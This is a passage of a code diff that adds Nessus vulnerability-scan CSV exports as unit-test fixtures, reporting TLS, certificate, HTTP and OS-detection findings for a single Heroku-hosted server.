+"21643","","","None","52.208.101.182","tcp","443","SSL Cipher Suites Supported","The remote service encrypts communications using SSL.","This plugin detects which SSL ciphers are supported by the remote +service for encrypting communications.","n/a","https://www.openssl.org/docs/man1.1.0/apps/ciphers.html +http://www.nessus.org/u?3a040ada"," +Here is the list of SSL ciphers supported by the remote server : +Each group is reported per SSL Version. + +SSL Version : TLSv12 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA256 0xC0, 0x2F ECDH RSA AES-GCM(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x30 ECDH RSA AES-GCM(256) SHA384 + RSA-AES128-SHA256 0x00, 0x9C RSA RSA AES-GCM(128) SHA256 + RSA-AES256-SHA384 0x00, 0x9D RSA RSA AES-GCM(256) SHA384 + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + RSA-AES128-SHA256 0x00, 0x3C RSA RSA AES-CBC(128) SHA256 + RSA-AES256-SHA256 0x00, 0x3D RSA RSA AES-CBC(256) SHA256 + + +SSL Version : TLSv11 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + + +SSL Version : TLSv1 + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +","","","","","None","","","","2006/06/05","2020/11/24","","","" +"22964","","","None","52.208.101.182","tcp","80","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A web server is running on this port.","","","","","None","","","","2007/08/19","2020/11/19","","","" +"22964","","","None","52.208.101.182","tcp","443","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A TLSv1 server answered on this port. +","","","","","None","","","","2007/08/19","2020/11/19","","","" +"22964","","","None","52.208.101.182","tcp","443","Service Detection","The remote service could be identified.","Nessus was able to identify the remote service by its banner or by +looking at the error message it sends when it receives an HTTP +request.","n/a","","A web server is running on this port through TLSv1.","","","","","None","","","","2007/08/19","2020/11/19","","","" +"24260","","","None","52.208.101.182","tcp","80","HyperText Transfer Protocol (HTTP) Information","Some information about the remote HTTP configuration can be extracted.","This test gives some information about the remote HTTP protocol - the +version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, +etc... + +This test is informational only and does not denote any security +problem.","n/a",""," +Response Code : HTTP/1.1 404 Not Found + +Protocol version : HTTP/1.1 +SSL : no +Keep-Alive : no +Options allowed : (Not implemented) +Headers : + + Connection: close + Server: Cowboy + Date: Mon, 25 Jan 2021 17:46:16 GMT + Content-Length: 494 + Content-Type: text/html; charset=utf-8 + Cache-Control: no-cache, no-store + +Response Body : + +","","","","","None","","","","2007/01/30","2019/11/22","","","" +"24260","","","None","52.208.101.182","tcp","443","HyperText Transfer Protocol (HTTP) Information","Some information about the remote HTTP configuration can be extracted.","This test gives some information about the remote HTTP protocol - the +version used, whether HTTP Keep-Alive and HTTP pipelining are enabled, +etc... + +This test is informational only and does not denote any security +problem.","n/a",""," +Response Code : HTTP/1.1 404 Not Found + +Protocol version : HTTP/1.1 +SSL : yes +Keep-Alive : no +Options allowed : (Not implemented) +Headers : + + Connection: close + Server: Cowboy + Date: Mon, 25 Jan 2021 17:46:17 GMT + Content-Length: 494 + Content-Type: text/html; charset=utf-8 + Cache-Control: no-cache, no-store + +Response Body : + +","","","","","None","","","","2007/01/30","2019/11/22","","","" +"25220","","","None","52.208.101.182","tcp","0","TCP/IP Timestamps Supported","The remote service implements TCP timestamps.","The remote host implements TCP timestamps, as defined by RFC1323. A +side effect of this feature is that the uptime of the remote host can +sometimes be computed.","n/a","http://www.ietf.org/rfc/rfc1323.txt","","","","","","None","","","","2007/05/16","2019/03/06","","","" +"45410","","","None","52.208.101.182","tcp","443","SSL Certificate 'commonName' Mismatch","The 'commonName' (CN) attribute in the SSL certificate does not match +the hostname.","The service running on the remote host presents an SSL certificate for +which the 'commonName' (CN) attribute does not match the hostname on +which the service listens.","If the machine has several names, make sure that users connect to the +service through the DNS hostname that matches the common name in the +certificate.",""," +The host name known by Nessus is : + + ec2-52-208-101-182.eu-west-1.compute.amazonaws.com + +The Common Name in the certificate is : + + *.herokuapp.com + +The Subject Alternate Names in the certificate are : + + *.herokuapp.com + herokuapp.com +","","","","","None","","","","2010/04/03","2019/06/25","","","" +"45590","","","None","52.208.101.182","tcp","0","Common Platform Enumeration (CPE)","It was possible to enumerate CPE names that matched on the remote +system.","By using information obtained from a Nessus scan, this plugin reports +CPE (Common Platform Enumeration) matches for various hardware and +software products found on a host. + +Note that if an official CPE is not available for the product, this +plugin computes the best possible CPE based on the information +available from the scan.","n/a","http://cpe.mitre.org/ +https://nvd.nist.gov/products/cpe"," +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2012:r2 +","","","","","None","","","","2010/04/21","2021/01/15","","","" +"50845","","","None","52.208.101.182","tcp","443","OpenSSL Detection","The remote service appears to use OpenSSL to encrypt traffic.","Based on its response to a TLS request with a specially crafted +server name extension, it seems that the remote service is using the +OpenSSL library to encrypt traffic. + +Note that this plugin can only detect OpenSSL implementations that +have enabled support for TLS extensions (RFC 4366).","n/a","https://www.openssl.org/","","","","","","None","","","","2010/11/30","2020/06/12","","","" +"51891","","","None","52.208.101.182","tcp","443","SSL Session Resume Supported","The remote host allows resuming SSL sessions.","This script detects whether a host allows resuming SSL sessions by +performing a full SSL handshake to receive a session ID, and then +reconnecting with the previously used session ID. If the server +accepts the session ID in the second connection, the server maintains +a cache of sessions that can be resumed.","n/a",""," +This port supports resuming TLSv1 / TLSv1 / TLSv1 sessions. +","","","","","None","","","","2011/02/07","2020/08/17","","","" +"54615","","","None","52.208.101.182","tcp","0","Device Type","It is possible to guess the remote device type.","Based on the remote operating system, it is possible to determine +what the remote system type is (eg: a printer, router, general-purpose +computer, etc).","n/a","","Remote device type : unknown +Confidence level : 56 +","","","","","None","","","","2011/05/23","2011/05/23","","","" +"56984","","","None","52.208.101.182","tcp","443","SSL / TLS Versions Supported","The remote service encrypts communications.","This plugin detects which SSL and TLS versions are supported by the +remote service for encrypting communications.","n/a",""," +This port supports TLSv1.0/TLSv1.1/TLSv1.2. +","","","","","None","","","","2011/12/01","2020/07/09","","","" +"57041","","","None","52.208.101.182","tcp","443","SSL Perfect Forward Secrecy Cipher Suites Supported","The remote service supports the use of SSL Perfect Forward Secrecy +ciphers, which maintain confidentiality even if the key is stolen.","The remote host supports the use of SSL ciphers that offer Perfect +Forward Secrecy (PFS) encryption. These cipher suites ensure that +recorded SSL traffic cannot be broken at a future date if the server's +private key is compromised.","n/a","https://www.openssl.org/docs/manmaster/man1/ciphers.html +https://en.wikipedia.org/wiki/Diffie-Hellman_key_exchange +https://en.wikipedia.org/wiki/Perfect_forward_secrecy"," +Here is the list of SSL PFS ciphers supported by the remote server : + + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA256 0xC0, 0x2F ECDH RSA AES-GCM(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x30 ECDH RSA AES-GCM(256) SHA384 + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +","","","","","None","","","","2011/12/07","2018/11/15","","","" +"70544","","","None","52.208.101.182","tcp","443","SSL Cipher Block Chaining Cipher Suites Supported","The remote service supports the use of SSL Cipher Block Chaining +ciphers, which combine previous blocks with subsequent ones.","The remote host supports the use of SSL ciphers that operate in Cipher +Block Chaining (CBC) mode. These cipher suites offer additional +security over Electronic Codebook (ECB) mode, but have the potential to +leak information if used improperly.","n/a","https://www.openssl.org/docs/manmaster/man1/ciphers.html +http://www.nessus.org/u?cc4a822a +https://www.openssl.org/~bodo/tls-cbc.txt"," +Here is the list of SSL CBC ciphers supported by the remote server : + + High Strength Ciphers (>= 112-bit key) + + Name Code KEX Auth Encryption MAC + ---------------------- ---------- --- ---- --------------------- --- + ECDHE-RSA-AES128-SHA 0xC0, 0x13 ECDH RSA AES-CBC(128) SHA1 + ECDHE-RSA-AES256-SHA 0xC0, 0x14 ECDH RSA AES-CBC(256) SHA1 + AES128-SHA 0x00, 0x2F RSA RSA AES-CBC(128) SHA1 + AES256-SHA 0x00, 0x35 RSA RSA AES-CBC(256) SHA1 + ECDHE-RSA-AES128-SHA256 0xC0, 0x27 ECDH RSA AES-CBC(128) SHA256 + ECDHE-RSA-AES256-SHA384 0xC0, 0x28 ECDH RSA AES-CBC(256) SHA384 + RSA-AES128-SHA256 0x00, 0x3C RSA RSA AES-CBC(128) SHA256 + RSA-AES256-SHA256 0x00, 0x3D RSA RSA AES-CBC(256) SHA256 + +The fields above are : + + {Tenable ciphername} + {Cipher ID code} + Kex={key exchange} + Auth={authentication} + Encrypt={symmetric encryption method} + MAC={message authentication code} + {export flag} +","","","","","None","","","","2013/10/22","2018/11/15","","","" +"84502","","","None","52.208.101.182","tcp","443","HSTS Missing From HTTPS Server","The remote web server is not enforcing HSTS.","The remote HTTPS server is not enforcing HTTP Strict Transport Security (HSTS). +HSTS is an optional response header that can be configured on the server to instruct +the browser to only communicate via HTTPS. The lack of HSTS allows downgrade attacks, +SSL-stripping man-in-the-middle attacks, and weakens cookie-hijacking protections.","Configure the remote web server to use HSTS.","https://tools.ietf.org/html/rfc6797"," + The remote HTTPS server does not send the HTTP + ""Strict-Transport-Security"" header. +","","","","","None","","","","2015/07/02","2020/11/06","","","" +"94761","","","None","52.208.101.182","tcp","443","SSL Root Certification Authority Certificate Information","A root Certification Authority certificate was found at the top of the +certificate chain.","The remote service uses an SSL certificate chain that contains a +self-signed root Certification Authority certificate at the top of the +chain.","Ensure that use of this root Certification Authority certificate +complies with your organization's acceptable use and security +policies.","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778623(v=ws.10)"," +The following root Certification Authority certificate was found : + +|-Subject : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Issuer : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Valid From : Nov 10 00:00:00 2006 GMT +|-Valid To : Nov 10 00:00:00 2031 GMT +|-Signature Algorithm : SHA-1 With RSA Encryption +","","","","","None","","","","2016/11/14","2018/11/15","","","" +"95631","CVE-2004-2761","","None","52.208.101.182","tcp","443","SSL Certificate Signed Using Weak Hashing Algorithm (Known CA)","A known CA SSL certificate in the certificate chain has been signed +using a weak hashing algorithm.","The remote service uses a known CA certificate in the SSL certificate +chain that has been signed using a cryptographically weak hashing +algorithm (e.g., MD2, MD4, MD5, or SHA1). These signature algorithms +are known to be vulnerable to collision attacks. An attacker can +exploit this to generate another certificate with the same digital +signature, allowing the attacker to masquerade as the affected +service. + +Note that this plugin reports all SSL certificate chains signed with +SHA-1 that expire after January 1, 2017 as vulnerable. This is in +accordance with Google's gradual sunsetting of the SHA-1 cryptographic +hash algorithm.","Contact the Certificate Authority to have the certificate reissued.","https://tools.ietf.org/html/rfc3279 +https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2008/961509"," +The following known CA certificates were part of the certificate +chain sent by the remote host, but contain hashes that are considered +to be weak. + +|-Subject : C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA +|-Signature Algorithm : SHA-1 With RSA Encryption +|-Valid From : Nov 10 00:00:00 2006 GMT +|-Valid To : Nov 10 00:00:00 2031 GMT +","","","","","None","11849;33065","CERT:836068;CWE:310","","2016/12/08","2019/11/26","","","" +"104743","","6.1","Medium","52.208.101.182","tcp","443","TLS Version 1.0 Protocol Detection","The remote service encrypts traffic using an older version of TLS.","The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a +number of cryptographic design flaws. Modern implementations of TLS 1.0 +mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are +designed against these flaws and should be used whenever possible. + +As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 +and higher will no longer function properly with major web browsers and major vendors. + +PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, +2018, except for POS POI terminals (and the SSL/TLS termination +points to which they connect) that can be verified as not being +susceptible to any known exploits.","Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.","https://tools.ietf.org/html/draft-ietf-tls-oldversions-deprecate-00","TLSv1 is enabled and the server supports at least one cipher.","","6.5","","","Medium","","","","2017/11/22","2020/03/31","","","" +"121010","","","None","52.208.101.182","tcp","443","TLS Version 1.1 Protocol Detection","The remote service encrypts traffic using an older version of TLS.","The remote service accepts connections encrypted using TLS 1.1. +TLS 1.1 lacks support for current and recommended cipher suites. +Ciphers that support encryption before MAC computation, and +authenticated encryption modes such as GCM cannot be used with +TLS 1.1 + +As of March 31, 2020, Endpoints that are not enabled for TLS 1.2 +and higher will no longer function properly with major web browsers and major vendors.","Enable support for TLS 1.2 and/or 1.3, and disable support for TLS 1.1.","https://tools.ietf.org/html/draft-ietf-tls-oldversions-deprecate-00 +http://www.nessus.org/u?c8ae820d","TLSv1.1 is enabled and the server supports at least one cipher.","","","","","None","","","","2019/01/08","2020/08/07","","","" +"136318","","","None","52.208.101.182","tcp","443","TLS Version 1.2 Protocol Detection","The remote service encrypts traffic using a version of TLS.","The remote service accepts connections encrypted using TLS 1.2.","N/A","https://tools.ietf.org/html/rfc5246","TLSv1.2 is enabled and the server supports at least one cipher.","","","","","None","","","","2020/05/04","2020/05/04","","","" diff --git a/unittests/scans/nessus/nessus_many_vuln2-default.csv b/unittests/scans/nessus/nessus_many_vuln2-default.csv new file mode 100644 index 00000000000..608809175e9 --- /dev/null +++ b/unittests/scans/nessus/nessus_many_vuln2-default.csv @@ -0,0 +1,535 @@ +Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output +"10107","","","None","52.208.101.182","tcp","80","HTTP Server Type and Version","A web server is running on the remote host.","This plugin attempts to determine the type and the version of the + remote web server.","n/a","","The remote web server type is : + +Cowboy" +"10107","","","None","52.208.101.182","tcp","443","HTTP Server Type and Version","A web server is running on the remote host.","This plugin attempts to determine the type and the version of the + remote web server.","n/a","","The remote web server type is : + +Cowboy" +"10287","","","None","52.208.101.182","udp","0","Traceroute Information","It was possible to obtain traceroute information.","Makes a traceroute to the remote host.","n/a","","For your information, here is the traceroute from 192.168.1.150 to 52.208.101.182 : +192.168.1.150 +192.168.1.254 +194.149.169.240 +? +52.95.218.164 +52.93.16.70 +52.93.16.77 +? +150.222.240.32 +? + +Hop Count: 9 +" +"10863","","","None","52.208.101.182","tcp","443","SSL Certificate Information","This plugin displays the SSL certificate.","This plugin connects to every SSL-related port and attempts to +extract and dump the X.509 certificate.","n/a","","Subject Name: + +Country: US +State/Province: California +Locality: San Francisco +Organization: Heroku, Inc. +Common Name: *.herokuapp.com + +Issuer Name: + +Country: US +Organization: DigiCert Inc +Organization Unit: www.digicert.com +Common Name: DigiCert SHA2 High Assurance Server CA + +Serial Number: 0D 57 D1 0B 11 29 2A 3C 66 DF CD CF 3A E8 BE 65 + +Version: 3 + +Signature Algorithm: SHA-256 With RSA Encryption + +Not Valid Before: Jun 15 00:00:00 2020 GMT +Not Valid After: Jul 07 12:00:00 2021 GMT + +Public Key Info: + +Algorithm: RSA Encryption +Key Length: 2048 bits +Public Key: 00 C9 CD D6 B1 F8 39 B6 2E 63 93 47 6F EC 55 E1 55 77 D1 9F + 9D C6 99 12 71 61 56 CA 2E 32 37 CE 9E 4C E0 3D F4 0F 45 76 + E0 B4 D1 40 E0 B4 CC 1A 0C 3F EB E8 B5 5F B6 56 98 D3 29 8A + 29 AE 3E 3B 6E 0F 10 7E 4C AE A4 7D D7 DC 89 35 2D A2 FA 59 + 49 D3 14 07 B6 19 4A B1 6F 46 1E EC B2 78 E8 BA 66 92 BB 70 + F1 AE 6A D4 7E 67 98 30 8C 6C 4F A0 C1 32 B7 5B 33 31 7F 01 + 51 9A 6C 1F EF FD 48 9D B3 94 2D 29 4E 6D CF D3 A4 0E 65 B9 + 10 13 38 90 C2 D3 96 3E 3E F6 F3 96 59 50 61 C2 71 F6 FF D5 + D6 23 26 9C 54 8A C9 BC A7 D4 C0 21 99 D6 E9 48 19 E3 CE EB + EB 5D 87 14 96 05 7D 2D DB 08 79 D2 E0 9B 24 4E C4 94 83 B0 + 2E 27 3E CF C7 8E 80 00 AB 86 27 C0 A8 57 D0 35 18 70 2A D2 + 78 05 C2 98 7B 8B AB 50 22 00 31 4A C9 E2 5C 7C FD E3 F2 60 + 66 29 A3 E6 B9 F5 D1 D6 D7 53 6F 13 8E 95 D0 75 81 +Exponent: 01 00 01 + +Signature Length: 256 bytes / 2048 bits +Signature: 00 69 14 80 6F 21 BC 90 9A A7 6F 89 7C 82 31 45 00 EA 23 11 + 98 05 7A A9 9A 64 72 50 96 C2 8B 7F 1A BA 0D C3 6F 5E 6C 03 + 19 0F F1 0E 68 B5 1A 7C E3 13 9C 00 B2 39 53 6D F0 08 C5 4C + 2C 3E DD 2E 26 23 33 C3 D9 4E 35 C4 C0 59 11 DD D9 CD 42 3E + BB 33 FE 96 62 BC 64 68 FC EE 7A D0 C0 28 B6 00 6D 6B 4E 7B + 5B 8C C9 61 44 22 A9 53 D4 8E 38 60 FF 9B 0C E4 AD 40 4D 1E + 15 0E AB D5 D4 D1 16 52 53 28 63 5A D0 A2 0C E5 16 9D 73 E7 + A2 F8 13 52 8F 9D 70 72 23 D9 A1 8A 01 6E 84 EB 27 A9 AF 44 + 90 38 10 1E 60 65 D1 85 F4 ED 72 5E 1A D8 2F 37 2B C6 4E 66 + A6 2E 40 4B 74 1E 75 11 1B DD D1 D8 BA 7F 6A 62 5A F3 99 54 + 49 70 9A 2C 0E FC 88 56 4A 2A 2D 3B A6 58 9D 85 F0 DA A5 32 + 0C E7 87 48 A1 C0 5D 93 EA 18 FA 01 F7 86 C6 64 1D CE A9 BC + 58 9F 60 E4 16 26 71 15 58 13 8A FE FF 8F 38 A7 AA + +Extension: Authority Key Identifier (2.5.29.35) +Critical: 0 +Key Identifier: 51 68 FF 90 AF 02 07 75 3C CC D9 65 64 62 A2 12 B8 59 72 3B + + +Extension: Subject Key Identifier (2.5.29.14) +Critical: 0 +Subject Key Identifier: 8B F5 13 D3 FC FB 0A AD A0 AF 9F 6F C2 42 C4 D8 47 4C CB E5 + + +Extension: Subject Alternative Name (2.5.29.17) +Critical: 0 +DNS: *.herokuapp.com +DNS: herokuapp.com + + +Extension: Key Usage (2.5.29.15) +Critical: 1 +Key Usage: Digital Signature, Key Encipherment + + +Extension: Extended Key Usage (2.5.29.37) +Critical: 0 +Purpose#1: Web Server Authentication (1.3.6.1.5.5.7.3.1) +Purpose#2: Web Client Authentication (1.3.6.1.5.5.7.3.2) + + +Extension: CRL Distribution Points (2.5.29.31) +Critical: 0 +URI: http://crl3.digicert.com/sha2-ha-server-g6.crl +URI: http://crl4.digicert.com/sha2-ha-server-g6.crl + + +Extension: Policies (2.5.29.32) +Critical: 0 +Policy ID #1: 2.16.840.1.114412.1.1 +Qualifier ID #1: Certification Practice Statement (1.3.6.1.5.5.7.2.1) +CPS URI: https://www.digicert.com/CPS +Policy ID #2: 2.23.140.1.2.2 + + +Extension: Authority Information Access (1.3.6.1.5.5.7.1.1) +Critical: 0 +Method#1: Online Certificate Status Protocol +URI: http://ocsp.digicert.com +Method#2: Certificate Authority Issuers +URI: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt + + +Extension: Basic Constraints (2.5.29.19) +Critical: 1 + + +Extension: 1.3.6.1.4.1.11129.2.4.2 +Critical: 0 +Data: 04 81 F2 00 F0 00 76 00 F6 5C 94 2F D1 77 30 22 14 54 18 08 + 30 94 56 8E E3 4D 13 19 33 BF DF 0C 2F 20 0B CC 4E F1 64 E3 + 00 00 01 72 B9 14 F9 59 00 00 04 03 00 47 30 45 02 20 39 8A + E8 8C 54 92 F6 92 D9 5A F0 F1 C7 C2 DC 3D FB 3B 1B 54 EA DC + 18 6B 1C 29 40 7C BA 1A B0 E3 02 21 00 8F 79 3E 70 23 A5 78 + 4C 6C 66 2C C2 C8 4B 57 D7 5E DD 4A 7A FC 86 58 9E EC D3 C8 + F2 1D 1A 37 91 00 76 00 5C DC 43 92 FE E6 AB 45 44 B1 5E 9A + D4 56 E6 10 37 FB D5 FA 47 DC A1 73 94 B2 5E E6 F6 C7 0E CA + 00 00 01 72 B9 14 F9 77 00 00 04 03 00 47 30 45 02 21 00 B6 + 46 D0 D7 26 A0 16 70 A1 34 B1 45 30 73 B3 64 1A 9C D2 55 0A + E2 8B 15 E9 34 97 7A B1 7E E6 37 02 20 4C 3D D5 A0 04 FF FA + A3 21 43 78 82 8C 6C 8F 43 C2 92 52 8F 44 92 27 04 55 65 48 + 28 88 72 E8 27 + + +Fingerprints : + +SHA-256 Fingerprint: 82 6F E8 01 13 78 A9 2A 76 2B B6 9F 2F 8C EB 11 D2 4E 2E 4D + 9F 66 FA 71 E8 C7 88 55 FB C2 BB AB +SHA-1 Fingerprint: 94 FC F6 23 6C 37 D5 E7 92 78 3C 0B 5F AD 0C E4 9E FD 9E A8 +MD5 Fingerprint: 91 A3 72 2F ED A2 E8 69 3E EC A5 24 E8 38 F5 61 + + +PEM certificate : + +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE-----" +"11219","","","None","52.208.101.182","tcp","80","Nessus SYN scanner","It is possible to determine which TCP ports are open.","This plugin is a SYN 'half-open' port scanner. It shall be reasonably +quick even against a firewalled target. + +Note that SYN scans are less intrusive than TCP (full connect) scans +against broken services, but they might cause problems for less robust +firewalls and also leave unclosed connections on the remote target, if +the network is loaded.","Protect your target with an IP filter.","","Port 80/tcp was found to be open" +"11219","","","None","52.208.101.182","tcp","443","Nessus SYN scanner","It is possible to determine which TCP ports are open.","This plugin is a SYN 'half-open' port scanner. It shall be reasonably +quick even against a firewalled target. + +Note that SYN scans are less intrusive than TCP (full connect) scans +against broken services, but they might cause problems for less robust +firewalls and also leave unclosed connections on the remote target, if +the network is loaded.","Protect your target with an IP filter.","","Port 443/tcp was found to be open" +"11936","","","None","52.208.101.182","tcp","0","OS Identification","It is possible to guess the remote operating system.","Using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, +SNMP, etc.), it is possible to guess the name of the remote operating +system in use. It is also possible sometimes to guess the version of +the operating system.","n/a",""," +Remote operating system : Microsoft Windows Server 2012 R2 +Confidence level : 56 +Method : MLSinFP + + +The remote host is running Microsoft Windows Server 2012 R2" +"12053","","","None","52.208.101.182","tcp","0","Host Fully Qualified Domain Name (FQDN) Resolution","It was possible to resolve the name of the remote host.","Nessus was able to resolve the fully qualified domain name (FQDN) of +the remote host.","n/a",""," +52.208.101.182 resolves as ec2-52-208-101-182.eu-west-1.compute.amazonaws.com. +" +"19506","","","None","52.208.101.182","tcp","0","Nessus Scan Information","This plugin displays information about the Nessus scan.","This plugin displays, for each tested host, information about the +scan itself : + + - The version of the plugin set. + - The type of scanner (Nessus or Nessus Home). + - The version of the Nessus Engine. + - The port scanner(s) used. + - The port range scanned. + - Whether credentialed or third-party patch management + checks are possible. + - Whether the display of superseded patches is enabled + - The date of the scan. + - The duration of the scan. + - The number of hosts scanned in parallel. + - The number of checks done in parallel.","n/a","","Information about this scan : + +Nessus version : 8.13.1 +Plugin feed version : 202101230522 +Scanner edition used : Nessus +Scan type : Normal +Scan policy used : Basic Network Scan +Scanner IP : 192.168.1.150 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no 